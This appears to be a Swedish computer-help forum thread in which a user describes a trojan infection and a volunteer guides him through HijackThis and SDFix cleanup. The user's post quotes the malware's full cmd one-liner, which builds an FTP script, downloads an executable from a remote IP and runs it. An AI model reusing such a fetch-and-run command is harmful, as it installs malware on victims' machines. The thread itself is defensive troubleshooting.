Trojan öppnar kommandotolken ??

[Mangejohan]

Hej,

 

Jag har råkat ut för en trojan eller liknande... Den startar med att i "run" skriva in detta:

 

cmd /c echo OPEN 85.230.0.171 9662>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

 

Sedan öppnas kommandotolken och där printas det in något om FTP.. Har hänt 10 ggr nu på två dagar och jag har stängt ner tolken innan något annat hänt.

 

Norton antivirus hittar ingenting.

F-Secures onlinescanning hittade detta:

84785_norton.exe

086.exe

x

textFTPBot (glömde spara ner namnet på den..något liknande iaf)

 

Ad-aware hittade detta:

 

DYFUCA

»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

obj[0]=Regkey : S-1-5-21-1957994488-73586283-1801674531-5407\software\avenue media

obj[17]=Regkey : software\avenue media

 

TRACKING COOKIE

»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

obj[1]=IECache Entry : Cookie:magnus.johansson@adtech.de/

obj[2]=IECache Entry : Cookie:magnus.johansson@tribalfusion.com/

obj[3]=IECache Entry : Cookie:magnus.johansson@instadia.net/

obj[4]=IECache Entry : Cookie:magnus.johansson@atdmt.com/

obj[5]=IECache Entry : Cookie:magnus.johansson@revsci.net/

obj[6]=IECache Entry : Cookie:magnus.johansson@ads.pointroll.com/

obj[7]=IECache Entry : Cookie:magnus.johansson@statse.webtrendslive.com/

obj[8]=IECache Entry : Cookie:magnus.johansson@doubleclick.net/

obj[9]=IECache Entry : Cookie:magnus.johansson@bluestreak.com/

obj[10]=IECache Entry : Cookie:magnus.johansson@advertising.com/

obj[11]=IECache Entry : Cookie:magnus.johansson@zedo.com/

obj[12]=IECache Entry : Cookie:magnus.johansson@questionmarket.com/

obj[13]=IECache Entry : Cookie:magnus.johansson@mediaplex.com/

obj[14]=IECache Entry : Cookie:magnus.johansson@tradedoubler.com/

obj[15]=IECache Entry : Cookie:magnus.johansson@clickbank.net/

obj[16]=IECache Entry : C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt

 

Inget verkar hjälpa då samma process startades nyss...

 

Jag får nog rensa hårddisken då detta är en arbetsdator och jag bör hitta felet innan jag kopplar upp mig på nätverket igen..

 

Någon som känner igen problemet och kan hjälpa mig ?

 

// Magnus

 

 

 

 

 

[Cecilia]

F-Secures onlinescanning hittade detta:

84785_norton.exe

086.exe

x

textFTPBot (glömde spara ner namnet på den..något liknande iaf)

Det är viktigt att du skriver ner både vad otrevligheten heter och i vilken fil och mapp den finns.

 

Vi kan ju se om HijackThis visar något till att börja med:

http://www.thespykiller.co.uk/files/HJTsetup.exe

Installera, kör, skanna och spara loggen (inget annat).

 

I ditt svar bifogar du HijackThis-loggen på detta sätt:

Tryck på LOG-knappen i Besvara-fönstret

Klistra in loggen

Tryck igen på LOG-knappen

 

Utifall att det var Trojan Downloader.BAT.Ftp.något som hittades så kan nedanstående vara bra.

 

Ladda ner SDFix till Skrivbordet:

http://downloads.andymanchesta.com/RemovalTools/SDFix.exe

Dubbelklicka på SDFix.exe och en ny mapp skapas, C:\SDFix.

 

Starta om datorn i felsäkert läge (tryck F8 upprepade gånger under uppstarten och välj felsäkert läge i menyn).

 

Öppna den nya mappen C:\SDFix och dubbelklicka på RunThis.bat för att starta programmet.

Tryck Y för att fortsätta.

Det arbetar ett tag och när det är klart så kommer det upp en fråga om du vill starta om datorn.

Tryck på godtycklig tangent för att omstarten ska påbörjas.

Datorn kommer att ta lång tid på sig under uppstarten eftersom programmet kommer att gå igång och fixa till en massa.

När det är klart visas Finished.

Tryck på valfri tangent för att avsluta programmet.

 

Öppna mappen SDFix och öppna filen Report.txt i Anteckningar.

Klistra in innehållet i filen i ditt svar här med användning av LOG-knappen.